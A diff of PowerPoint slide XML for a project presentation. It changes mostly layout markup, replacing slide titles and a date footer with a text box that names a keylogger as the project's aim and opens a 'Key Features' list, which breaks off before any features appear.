-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="314325" h="323850">
-                <a:moveTo>
-                  <a:pt x="314325" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="0" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="323850"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="314325" y="323850"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="314325" y="0"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-          <a:solidFill>
-            <a:srgbClr val="2D83C3"/>
-          </a:solidFill>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="object 4"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="9353550" y="5895975"/>
-            <a:ext cx="180975" cy="180975"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="180975" h="180975">
-                <a:moveTo>
-                  <a:pt x="180975" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="0" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="180975"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="180975" y="180975"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="180975" y="0"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-          <a:solidFill>
-            <a:srgbClr val="2D936B"/>
-          </a:solidFill>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="5" name="object 5"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="699452" y="891793"/>
-            <a:ext cx="5014595" cy="518159"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="12700">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="130"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="3200" spc="25" dirty="0"/>
-              <a:t>W</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3200" spc="-20" dirty="0"/>
-              <a:t>H</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3200" spc="20" dirty="0"/>
-              <a:t>O</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3200" spc="-235" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3200" spc="-10" dirty="0"/>
-              <a:t>AR</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3200" spc="15" dirty="0"/>
-              <a:t>E</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3200" spc="-35" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3200" spc="-10" dirty="0"/>
-              <a:t>T</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3200" spc="-15" dirty="0"/>
-              <a:t>H</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3200" spc="15" dirty="0"/>
-              <a:t>E</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3200" spc="-35" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3200" spc="-20" dirty="0"/>
-              <a:t>E</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3200" spc="30" dirty="0"/>
-              <a:t>N</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3200" spc="15" dirty="0"/>
-              <a:t>D</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3200" spc="-45" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3200" dirty="0"/>
-              <a:t>U</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3200" spc="10" dirty="0"/>
-              <a:t>S</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3200" spc="-25" dirty="0"/>
-              <a:t>E</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3200" spc="-10" dirty="0"/>
-              <a:t>R</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3200" spc="5" dirty="0"/>
-              <a:t>S?</a:t>
-            </a:r>
-            <a:endParaRPr sz="3200"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="6" name="object 6"/>
-          <p:cNvPicPr/>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId2" cstate="print"/>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="723900" y="6172200"/>
-            <a:ext cx="2181225" cy="485775"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="7" name="object 7"/>
+          <p:cNvPr id="11" name="TextBox 10">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D462208-B0BF-41F2-CD4D-198D19BEF056}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
           <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="739775" y="6473337"/>
-            <a:ext cx="1798955" cy="191770"/>
+            <a:off x="574266" y="1150562"/>
+            <a:ext cx="8534400" cy="5724644"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
+          <a:noFill/>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="6985" rIns="0" bIns="0" rtlCol="0">
+          <a:bodyPr wrap="square" rtlCol="0">
             <a:spAutoFit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="12700">
+            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
               <a:lnSpc>
                 <a:spcPct val="100000"/>
               </a:lnSpc>
               <a:spcBef>
-                <a:spcPts val="55"/>
+                <a:spcPct val="0"/>
               </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1100" spc="20" dirty="0">
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
                 <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
+                  <a:schemeClr val="tx1"/>
                 </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>3/21/202</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" spc="10" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>4</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" spc="130" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="50" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>A</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="15" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>nnu</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="10" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>al</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="-140" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>R</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="35" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>e</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="90" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>v</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="-35" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="35" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>e</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="15" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>w</a:t>
-            </a:r>
-            <a:endParaRPr sz="1100">
-              <a:latin typeface="Trebuchet MS"/>
-              <a:cs typeface="Trebuchet MS"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="8" name="object 8"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldNum" sz="quarter" idx="7"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="6985" rIns="0" bIns="0" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="38100">
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Our project aims to address the issues identified in the problem statement by developing a user-friendly and efficient key logger.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
               <a:lnSpc>
                 <a:spcPct val="100000"/>
               </a:lnSpc>
               <a:spcBef>
-                <a:spcPts val="55"/>
+                <a:spcPct val="0"/>
               </a:spcBef>
-            </a:pPr>
-            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
-              <a:rPr spc="10" dirty="0"/>
-              <a:t>6</a:t>
-            </a:fld>
-            <a:endParaRPr spc="10" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide7.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="2" name="object 2"/>
-          <p:cNvPicPr/>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId2" cstate="print"/>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="0" y="1476375"/>
-            <a:ext cx="2695574" cy="3248025"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="object 3"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="9353550" y="5362575"/>
-            <a:ext cx="457200" cy="457200"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="457200" h="457200">
-                <a:moveTo>
-                  <a:pt x="457200" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="0" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="457200"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="457200" y="457200"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="457200" y="0"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-          <a:solidFill>
-            <a:srgbClr val="42AF51"/>
-          </a:solidFill>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="object 4"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="6696075" y="1695450"/>
-            <a:ext cx="314325" cy="323850"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="314325" h="323850">
-                <a:moveTo>
-                  <a:pt x="314325" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="0" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="323850"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="314325" y="323850"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="314325" y="0"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-          <a:solidFill>
-            <a:srgbClr val="2D83C3"/>
-          </a:solidFill>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="5" name="object 5"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="9353550" y="5895975"/>
-            <a:ext cx="180975" cy="180975"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="180975" h="180975">
-                <a:moveTo>
-                  <a:pt x="180975" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="0" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="180975"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="180975" y="180975"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="180975" y="0"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-          <a:solidFill>
-            <a:srgbClr val="2D936B"/>
-          </a:solidFill>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="6" name="object 6"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="558165" y="857885"/>
-            <a:ext cx="9763125" cy="575310"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="12700">
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+              <a:ln>
+                <a:noFill/>
+              </a:ln>
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+              <a:effectLst/>
+              <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
               <a:lnSpc>
                 <a:spcPct val="100000"/>
               </a:lnSpc>
               <a:spcBef>
-                <a:spcPts val="105"/>
+                <a:spcPct val="0"/>
               </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="3600" spc="-40" dirty="0"/>
-              <a:t>Y</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="10" dirty="0"/>
-              <a:t>O</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="25" dirty="0"/>
-              <a:t>U</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" dirty="0"/>
-              <a:t>R</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="5" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="25" dirty="0"/>
-              <a:t>S</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="10" dirty="0"/>
-              <a:t>O</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="25" dirty="0"/>
-              <a:t>LU</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="-35" dirty="0"/>
-              <a:t>T</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="-30" dirty="0"/>
-              <a:t>I</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="10" dirty="0"/>
-              <a:t>O</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" dirty="0"/>
-              <a:t>N</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="-345" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="-35" dirty="0"/>
-              <a:t>A</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="-5" dirty="0"/>
-              <a:t>N</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" dirty="0"/>
-              <a:t>D</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="35" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="-30" dirty="0"/>
-              <a:t>I</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="-35" dirty="0"/>
-              <a:t>T</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" dirty="0"/>
-              <a:t>S</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="60" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="-295" dirty="0"/>
-              <a:t>V</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="-35" dirty="0"/>
-              <a:t>A</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="25" dirty="0"/>
-              <a:t>LU</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" dirty="0"/>
-              <a:t>E</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="-65" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="-15" dirty="0"/>
-              <a:t>P</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="-30" dirty="0"/>
-              <a:t>R</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="10" dirty="0"/>
-              <a:t>O</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="-15" dirty="0"/>
-              <a:t>P</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="10" dirty="0"/>
-              <a:t>O</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="25" dirty="0"/>
-              <a:t>S</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="-30" dirty="0"/>
-              <a:t>I</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="-35" dirty="0"/>
-              <a:t>T</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="-30" dirty="0"/>
-              <a:t>I</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" spc="10" dirty="0"/>
-              <a:t>O</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="3600" dirty="0"/>
-              <a:t>N</a:t>
-            </a:r>
-            <a:endParaRPr sz="3600"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="7" name="object 7"/>
-          <p:cNvPicPr/>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId3" cstate="print"/>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="676275" y="6467475"/>
-            <a:ext cx="2143125" cy="200025"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="8" name="object 8"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="739775" y="6473337"/>
-            <a:ext cx="1798955" cy="191770"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="6985" rIns="0" bIns="0" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="12700">
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Key Features</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="just" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
               <a:lnSpc>
                 <a:spcPct val="100000"/>
               </a:lnSpc>
               <a:spcBef>
-                <a:spcPts val="55"/>
+                <a:spcPct val="0"/>
               </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1100" spc="20" dirty="0">
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
